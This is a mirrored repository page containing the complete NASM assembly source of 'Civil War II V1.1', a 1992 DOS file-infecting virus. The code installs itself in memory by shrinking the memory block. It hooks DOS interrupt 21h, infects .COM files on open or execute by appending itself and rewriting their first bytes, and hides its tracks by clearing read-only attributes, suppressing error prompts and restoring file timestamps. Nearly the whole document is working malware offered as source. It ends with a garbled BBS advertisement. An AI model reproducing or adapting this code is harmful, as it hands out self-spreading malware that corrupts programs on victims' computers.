mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-05 09:55:27 +00:00
309 lines
8.0 KiB
NASM
309 lines
8.0 KiB
NASM
;****************************************************************************
|
||
; Civil War II V1.1 *
|
||
; *
|
||
; Assembled with Tasm 2.5 *
|
||
; (c) 1992 Trident/Dark Helmet, The Netherlands *
|
||
; *
|
||
;****************************************************************************
|
||
; *
|
||
; Civil War... *
|
||
; *
|
||
; "For all I've seen has change my mind *
|
||
; But still the wars go on as the years go by *
|
||
; With no love for God or human rights *
|
||
; 'Cause all these dreams are swept aside *
|
||
; By bloody hands of the hypnotized *
|
||
; Who carry the cross of homicide *
|
||
; And history bears the scars of our civil war" *
|
||
; *
|
||
;****************************************************************************
|
||
|
||
.Radix 16
|
||
Civil_War Segment
|
||
Model small
|
||
Assume cs:Civil_War, ds:Civil_War, es:Civil_War
|
||
|
||
org 100h
|
||
|
||
len equ offset last - begin
|
||
virus_len equ len / 16d
|
||
|
||
dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection
|
||
; marker
|
||
|
||
begin: Call virus ; make call to
|
||
; push IP on stack
|
||
|
||
virus: pop bp ; get IP from stack.
|
||
sub bp,109h ; adjust IP.
|
||
|
||
restore_host: mov di,0100h ; recover beginning
|
||
lea si,ds:[carrier_begin+bp] ; of carrier program.
|
||
mov cx,06h
|
||
rep movsb
|
||
|
||
check_resident: mov ah,0a0h ; check if virus
|
||
int 21h ; already installed.
|
||
cmp ax,0001h
|
||
je end_virus
|
||
|
||
adjust_memory: mov ax,cs ; start of Memory
|
||
dec ax ; Control Block
|
||
mov ds,ax
|
||
cmp byte ptr ds:[0000],5a ; check if last
|
||
; block
|
||
jne abort ; if not last block
|
||
; end
|
||
mov ax,ds:[0003] ; decrease memory
|
||
sub ax,40 ; by 1kbyte lenght
|
||
mov ds:[0003],ax
|
||
sub word ptr ds:[0012],40h
|
||
|
||
install_virus: mov bx,ax ; es point to start
|
||
mov ax,es ; virus in memory
|
||
add ax,bx
|
||
mov es,ax
|
||
mov cx,len ; cx = lenght virus
|
||
mov ax,ds ; restore ds
|
||
inc ax
|
||
mov ds,ax
|
||
lea si,ds:[begin+bp] ; point to start virus
|
||
lea di,es:0100 ; point to destination
|
||
rep movsb ; copy virus in
|
||
; memory
|
||
mov [virus_segment+bp],es ; store start virus
|
||
; in memory
|
||
mov ax,cs ; restore es
|
||
mov es,ax
|
||
|
||
hook_vector: cli ; no interups
|
||
mov ax,3521h ; revector int 21
|
||
int 21h
|
||
mov ds,[virus_segment+bp]
|
||
mov old_21h-6h,bx
|
||
mov old_21h+2-6h,es
|
||
|
||
mov dx,offset main_virus - 6h
|
||
mov ax,2521h
|
||
int 21h
|
||
sti
|
||
|
||
abort: mov ax,cs
|
||
mov ds,ax
|
||
mov es,ax
|
||
|
||
end_virus: mov bx,0100h ; jump to begin
|
||
jmp bx ; host file
|
||
|
||
|
||
;*****************************************************************************
|
||
|
||
main_virus: pushf
|
||
cmp ah,0a0h ; check virus call
|
||
jne new_21h ; no virus call
|
||
mov ax,0001h ; ax = id
|
||
popf ; return id
|
||
iret
|
||
|
||
new_21h: push ds ; save registers
|
||
push es
|
||
push di
|
||
push si
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
|
||
check_open: cmp ah,3dh
|
||
je chk_com
|
||
|
||
check_exec: cmp ax,04b00h ; exec function?
|
||
je chk_com
|
||
|
||
continu: pop dx ; restore registers
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
pop si
|
||
pop di
|
||
pop es
|
||
pop ds
|
||
popf
|
||
jmp dword ptr cs:[old_21h-6]
|
||
|
||
chk_com: mov cs:[name_seg-6],ds
|
||
mov cs:[name_off-6],dx
|
||
cld ; check extension
|
||
mov di,dx ; for COM
|
||
push ds
|
||
pop es
|
||
mov al,'.' ; search extension
|
||
repne scasb ; check for 'COM"
|
||
cmp word ptr es:[di],'OC' ; check 'CO'
|
||
jne continu
|
||
cmp word ptr es:[di+2],'M' ; check 'M'
|
||
jne continu
|
||
|
||
call set_int24h
|
||
call set_atribuut
|
||
|
||
open_file: mov ds,cs:[name_seg-6]
|
||
mov dx,cs:[name_off-6]
|
||
mov ax,3D02h ; open file
|
||
call do_int21h
|
||
jc close_file
|
||
push cs
|
||
pop ds
|
||
mov [handle-6],ax
|
||
mov bx,ax
|
||
|
||
call get_date
|
||
|
||
check_infect: push cs
|
||
pop ds
|
||
mov bx,[handle-6] ; read first 6 bytes
|
||
mov ah,3fh
|
||
mov cx,06h
|
||
lea dx,[carrier_begin-6]
|
||
call do_int21h
|
||
mov al, byte ptr [carrier_begin-6]+3 ; check initials
|
||
mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H'
|
||
cmp ax,[initials-6]
|
||
je save_date ; if equal already
|
||
; infect
|
||
|
||
get_lenght: mov ax,4200h ; file pointer begin
|
||
call move_pointer
|
||
mov ax,4202h ; file pointer end
|
||
call move_pointer
|
||
sub ax,03h ; ax = filelenght
|
||
mov [lenght_file-6],ax
|
||
|
||
call write_jmp
|
||
call write_virus
|
||
|
||
save_date: push cs
|
||
pop ds
|
||
mov bx,[handle-6]
|
||
mov dx,[date-6]
|
||
mov cx,[time-6]
|
||
mov ax,5701h
|
||
call do_int21h
|
||
|
||
close_file: mov bx,[handle-6]
|
||
mov ah,03eh ; close file
|
||
call do_int21h
|
||
|
||
mov dx,cs:[old_24h-6] ; restore int24h
|
||
mov ds,cs:[old_24h+2-6]
|
||
mov ax,2524h
|
||
call do_int21h
|
||
|
||
jmp continu
|
||
|
||
|
||
|
||
|
||
new_24h: mov al,3
|
||
iret
|
||
|
||
;---------------------------------------------------------------------------
|
||
; PROCEDURES
|
||
;---------------------------------------------------------------------------
|
||
|
||
move_pointer: push cs
|
||
pop ds
|
||
mov bx,[handle-6]
|
||
xor cx,cx
|
||
xor dx,dx
|
||
call do_int21h
|
||
ret
|
||
|
||
do_int21h: pushf
|
||
call dword ptr cs:[old_21h-6]
|
||
ret
|
||
|
||
write_jmp: push cs
|
||
pop ds
|
||
mov ax,4200h
|
||
call move_pointer
|
||
mov ah,40h
|
||
mov cx,01h
|
||
lea dx,[jump-6]
|
||
call do_int21h
|
||
mov ah,40h
|
||
mov cx,02h
|
||
lea dx,[lenght_file-6]
|
||
call do_int21h
|
||
mov ah,40h
|
||
mov cx,02h
|
||
lea dx,[initials-6]
|
||
call do_int21h
|
||
ret
|
||
|
||
write_virus: push cs
|
||
pop ds
|
||
mov ax,4202h
|
||
call move_pointer
|
||
mov ah,40
|
||
mov cx,len
|
||
mov dx,100
|
||
call do_int21h
|
||
ret
|
||
|
||
get_date: mov ax,5700h
|
||
call do_int21h
|
||
push cs
|
||
pop ds
|
||
mov [date-6],dx
|
||
mov [time-6],cx
|
||
ret
|
||
|
||
set_int24h: mov ax,3524h
|
||
call do_int21h
|
||
mov cs:[old_24h-6],bx
|
||
mov cs:[old_24h+2-6],es
|
||
mov dx,offset new_24h-6
|
||
push cs
|
||
pop ds
|
||
mov ax,2524h
|
||
call do_int21h
|
||
ret
|
||
|
||
set_atribuut: mov ax,4300h ; get atribuut
|
||
mov ds,cs:[name_seg-6]
|
||
mov dx,cs:[name_off-6]
|
||
call do_int21h
|
||
and cl,0feh ; set atribuut
|
||
mov ax,4301h
|
||
call do_int21h
|
||
ret
|
||
|
||
;---------------------------------------------------------------------------
|
||
; DATA
|
||
;---------------------------------------------------------------------------
|
||
|
||
old_21h dw 00h,00h
|
||
old_24h dw 00h,00h
|
||
carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h
|
||
text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h
|
||
jump db 0e9h
|
||
name_seg dw ?
|
||
name_off dw ?
|
||
virus_segment dw ?
|
||
lenght_file dw ?
|
||
handle dw ?
|
||
date dw ?
|
||
time dw ?
|
||
initials dw 4844h
|
||
last db 090h
|
||
|
||
Civil_war ends
|
||
end dummy
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|